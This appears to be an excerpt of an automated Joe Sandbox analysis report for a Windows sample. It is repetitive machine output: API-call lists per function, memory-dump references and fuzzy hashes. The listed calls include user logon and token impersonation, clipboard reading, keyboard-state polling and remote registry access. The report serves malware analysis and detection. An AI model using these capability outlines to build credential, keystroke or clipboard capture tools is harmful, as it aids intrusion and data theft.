• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
• Opcode ID: 0e9d2daa5ea85739aeeea0c831fb5f2666b59398245dbfa3b7d1be1f9881ffc3
• Instruction ID: dacee425c910bfaa96206d22267da07adffaa567bcb30bfeda36f638d9212ba9
• Opcode Fuzzy Hash: 0e9d2daa5ea85739aeeea0c831fb5f2666b59398245dbfa3b7d1be1f9881ffc3
• Instruction Fuzzy Hash: C3E0C272A002245BCB20E39C9C06FEA77EDDFC87A0F0540B5FD09D7258E960ED858690
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,009D0A84,?,?,00000000,?,009D0A84,00000000,0000000C), ref: 009D0737
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: b66757ac5ac2db951a775cd571f5fe59f7a2087dfa42ff665d345e4a7d57c124
• Instruction ID: c5c72a1ffd791024f6b369ca1f91b45a284b5ed392e6142daa335ff7d069fc67
• Opcode Fuzzy Hash: b66757ac5ac2db951a775cd571f5fe59f7a2087dfa42ff665d345e4a7d57c124
• Instruction Fuzzy Hash: 98D06C3200010DBBDF128F84DD06EDA3BAAFB48714F014110BE1856020C732E832AB90
APIs
• GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 435e103c5393a5fe9ae003334c5a84904d1cbc4d7ee7b38a4b00b34a7d0b40b6
• Instruction ID: 86abe82bb33092c2dcff905b2786936f63da5172dc7966056e0b64b036f1ccec
• Opcode Fuzzy Hash: 435e103c5393a5fe9ae003334c5a84904d1cbc4d7ee7b38a4b00b34a7d0b40b6
• Instruction Fuzzy Hash: 95B09234000A0445AD288A3C5A09DB9330C78523A67EC1BC0E579854F2D339C80FAB50
APIs
  • Part of subcall function 009FDC54: FindFirstFileW.KERNEL32(?,?), ref: 009FDCCB
  • Part of subcall function 009FDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 009FDD1B
  • Part of subcall function 009FDC54: FindNextFileW.KERNEL32(00000000,00000010), ref: 009FDD2C
  • Part of subcall function 009FDC54: FindClose.KERNEL32(00000000), ref: 009FDD43
• GetLastError.KERNEL32 ref: 00A0666E
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
• Opcode ID: 8fe9c5deee6f265d6d77a1b1c7305c7f7a96c21f9f3c61cd47e174e872f269c6
• Instruction ID: 82ed1d376b843746fd6c244222e97bd6ace3f1bbd0919b2bd1e3baf974a7fcbb
• Opcode Fuzzy Hash: 8fe9c5deee6f265d6d77a1b1c7305c7f7a96c21f9f3c61cd47e174e872f269c6
• Instruction Fuzzy Hash: 59F0A0366102049FCB14EF9CD855B6EB7E9AFC8320F048419F9498B352CB75BC02CB90
APIs
  • Part of subcall function 009F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009F205A
  • Part of subcall function 009F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009F2087
  • Part of subcall function 009F2010: GetLastError.KERNEL32 ref: 009F2097
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 009F1BD2
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009F1BF4
• CloseHandle.KERNEL32(?), ref: 009F1C05
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009F1C1D
• GetProcessWindowStation.USER32 ref: 009F1C36
• SetProcessWindowStation.USER32(00000000), ref: 009F1C40
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009F1C5C
  • Part of subcall function 009F1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009F1B48), ref: 009F1A20
  • Part of subcall function 009F1A0B: CloseHandle.KERNEL32(?,?,009F1B48), ref: 009F1A35
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0
• API String ID: 22674027-1027155976
• Opcode ID: 8fb0bd083238ed370afefaf70cec3194095454663363518228fddff740b3956b
• Instruction ID: e043ab62c076bfa12a25b813df49b68c63cb674beee61ecfc88f18bc0b5e25f2
• Opcode Fuzzy Hash: 8fb0bd083238ed370afefaf70cec3194095454663363518228fddff740b3956b
• Instruction Fuzzy Hash: 7F81447190020DABDF21DFA8DC49FFE7BB8EF48304F144129FA15A61A1D7758A56CBA0
APIs
  • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009F1A60
  • Part of subcall function 009F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A6C
  • Part of subcall function 009F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A7B
  • Part of subcall function 009F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A82
  • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009F1A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009F1518
                                                                                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009F154C
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F1563
                                                                                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009F159D
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009F15B9
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F15D0
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009F15D8
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009F15DF
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009F1600
                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 009F1607
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009F1636
                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009F1658
                                                                                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009F166A
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F1691
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F1698
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F16A1
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F16A8
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F16B1
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F16B8
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009F16C4
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F16CB
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: GetProcessHeap.KERNEL32(00000008,009F14FD,?,00000000,?,009F14FD,?), ref: 009F1AED
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009F14FD,?), ref: 009F1AF4
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009F14FD,?), ref: 009F1B03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4175595110-0
                                                                                                                                                                                                                                  • Opcode ID: a9bd6db2eefd8adb18e529f81699d07454a7549f86b17e86e663a8d8d21b06fc
                                                                                                                                                                                                                                  • Instruction ID: 9ce22bbac53754d39731a1ede55b8f6a88a884217a37a7a75f59620f6ebbdb10
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9bd6db2eefd8adb18e529f81699d07454a7549f86b17e86e663a8d8d21b06fc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8713AB2900209EBDF10DFA5DC49FBEBBBCBF44351F184625EA15E61A1D7319906CBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenClipboard.USER32(00A2DCD0), ref: 00A0F586
                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A0F594
                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00A0F5A0
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00A0F5AC
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00A0F5E4
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00A0F5EE
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A0F619
                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00A0F626
                                                                                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00A0F62E
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00A0F63F
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?), ref: 00A0F67F
                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A0F695
                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000F), ref: 00A0F6A1
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00A0F6B2
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A0F6D4
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A0F6F1
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A0F72F
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00A0F750
                                                                                                                                                                                                                                  • CountClipboardFormats.USER32 ref: 00A0F771
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00A0F7B6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 420908878-0
                                                                                                                                                                                                                                  • Opcode ID: aa7c39d99256ea0ea9e1c67cd57d15e1cccfb7fe55d800527130cfe4c807c069
                                                                                                                                                                                                                                  • Instruction ID: eb4667aecefd7ffbb3f354054a58e06fbf8805b13c3c7e0b16c7a12a75edff52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa7c39d99256ea0ea9e1c67cd57d15e1cccfb7fe55d800527130cfe4c807c069
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F61D031204305AFD720EF68EC85F7AB7A4AF84708F14456DF446976E2DB31E946CBA2
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00A07403
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A07457
                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A07493
                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A074BA
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A074F7
                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A07524
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                  • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                  • Opcode ID: 08732a5d3d0da7ce09b142bd7bfacdcc1cead359df88564f81ee35d2c12df3ae
                                                                                                                                                                                                                                  • Instruction ID: 98cb1bd7b54df5063067428e4d6e1479d5aadcecd2a8cf5e9b2611a324880ea5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08732a5d3d0da7ce09b142bd7bfacdcc1cead359df88564f81ee35d2c12df3ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AD162B1508304AFC710EBA8C855EBFB7ECAF89704F44491DF589D6192EB74EA44C762
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A0A0A8
• GetFileAttributesW.KERNEL32(?), ref: 00A0A0E6
• SetFileAttributesW.KERNEL32(?,?), ref: 00A0A100
• FindNextFileW.KERNEL32(00000000,?), ref: 00A0A118
• FindClose.KERNEL32(00000000), ref: 00A0A123
• FindFirstFileW.KERNEL32(*.*,?), ref: 00A0A13F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A0A18F
• SetCurrentDirectoryW.KERNEL32(00A57B94), ref: 00A0A1AD
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00A0A1B7
• FindClose.KERNEL32(00000000), ref: 00A0A1C4
• FindClose.KERNEL32(00000000), ref: 00A0A1D4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 5621c5d8adcc5004e6f94ffe84757dab7de8385c30c00a4b50d76555dec4a95e
• Instruction ID: 7c5ef9bfcccb266a6ba13efc72ebbd07a8e96fc04fb18453f0d17cba029051d6
• Opcode Fuzzy Hash: 5621c5d8adcc5004e6f94ffe84757dab7de8385c30c00a4b50d76555dec4a95e
• Instruction Fuzzy Hash: AA31D53150071DBBDB20EFB4EC49AEE73ACAF54321F100665F815E20D1EB70DA868B65
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A04785
• _wcslen.LIBCMT ref: 00A047B2
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00A047E2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A04803
• RemoveDirectoryW.KERNEL32(?), ref: 00A04813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A0489A
• CloseHandle.KERNEL32(00000000), ref: 00A048A5
• CloseHandle.KERNEL32(00000000), ref: 00A048B0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: af8c42b7bd5d589bd91d61500eb1fe36b689452b40b9fe0b34b542cfe3414afd
• Instruction ID: 1397c8468ee17611693679d0cdae76284a57f4791dea1e4f8bf354a89e78289f
• Opcode Fuzzy Hash: af8c42b7bd5d589bd91d61500eb1fe36b689452b40b9fe0b34b542cfe3414afd
• Instruction Fuzzy Hash: BB31AFB1900249ABDB21DBA4EC49FEB37BCFF89710F1085B6F609D60A1E77096458B64
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A0A203
• FindNextFileW.KERNEL32(00000000,?), ref: 00A0A25E
• FindClose.KERNEL32(00000000), ref: 00A0A269
• FindFirstFileW.KERNEL32(*.*,?), ref: 00A0A285
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A0A2D5
• SetCurrentDirectoryW.KERNEL32(00A57B94), ref: 00A0A2F3
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00A0A2FD
• FindClose.KERNEL32(00000000), ref: 00A0A30A
• FindClose.KERNEL32(00000000), ref: 00A0A31A
  • Part of subcall function 009FE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009FE3B4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 3bb8d2425e35cd1d1bf8c96c17d5d386233999808381ff1f25378ed57bcbdd4a
• Instruction ID: 681a4993b6724a2b3cfbe68018af367b3e28afebd2a57da7417cba09dcf0f143
• Opcode Fuzzy Hash: 3bb8d2425e35cd1d1bf8c96c17d5d386233999808381ff1f25378ed57bcbdd4a
• Instruction Fuzzy Hash: 2A31D27150071D6ECB20EBA4FC09AEE77ACAF59325F104171E811A20E1EB71DA868A52
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C99E
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00A1CA09
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1CA2D
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A1CA8C
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A1CB47
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A1CBB4
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A1CC49
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00A1CC9A
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A1CD43
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A1CDE2
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1CDEF
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
• Opcode ID: b6fdc315e97e8fd83b309ed62a8f52100dda058868a732b8e1904c58404e3be3
• Instruction ID: a72e6702d15e6aa16d767ca737ec28754c68812c473bf32d9f0cf2aa8acf927a
• Opcode Fuzzy Hash: b6fdc315e97e8fd83b309ed62a8f52100dda058868a732b8e1904c58404e3be3
• Instruction Fuzzy Hash: 63023171604200AFD715DF28C895F6ABBE5EF89314F1884ADF44ACB2A2DB31ED46CB51
APIs
• GetKeyboardState.USER32(?), ref: 009FA65D
• GetAsyncKeyState.USER32(000000A0), ref: 009FA6DE
• GetKeyState.USER32(000000A0), ref: 009FA6F9
• GetAsyncKeyState.USER32(000000A1), ref: 009FA713
• GetKeyState.USER32(000000A1), ref: 009FA728
• GetAsyncKeyState.USER32(00000011), ref: 009FA740
• GetKeyState.USER32(00000011), ref: 009FA752
• GetAsyncKeyState.USER32(00000012), ref: 009FA76A
• GetKeyState.USER32(00000012), ref: 009FA77C
• GetAsyncKeyState.USER32(0000005B), ref: 009FA794
• GetKeyState.USER32(0000005B), ref: 009FA7A6
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: f02db7315a3df1a752305efb5041b22c95b8750cde8efbd51a627fd7415a0b63
• Instruction ID: 36f3e054670a5ae47559c44b461c1768be04dbfb3e4d40a27f26a0cc43d3d77f
• Opcode Fuzzy Hash: f02db7315a3df1a752305efb5041b22c95b8750cde8efbd51a627fd7415a0b63
• Instruction Fuzzy Hash: AB41A6E49047CD6DFF31A76488047B5BEB86F15354F088059D7CA8A6C2EB949DC8C7A3
APIs
  • Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
  • Part of subcall function 009FEAB0: GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
• FindFirstFileW.KERNEL32(?,?), ref: 009FD9CD
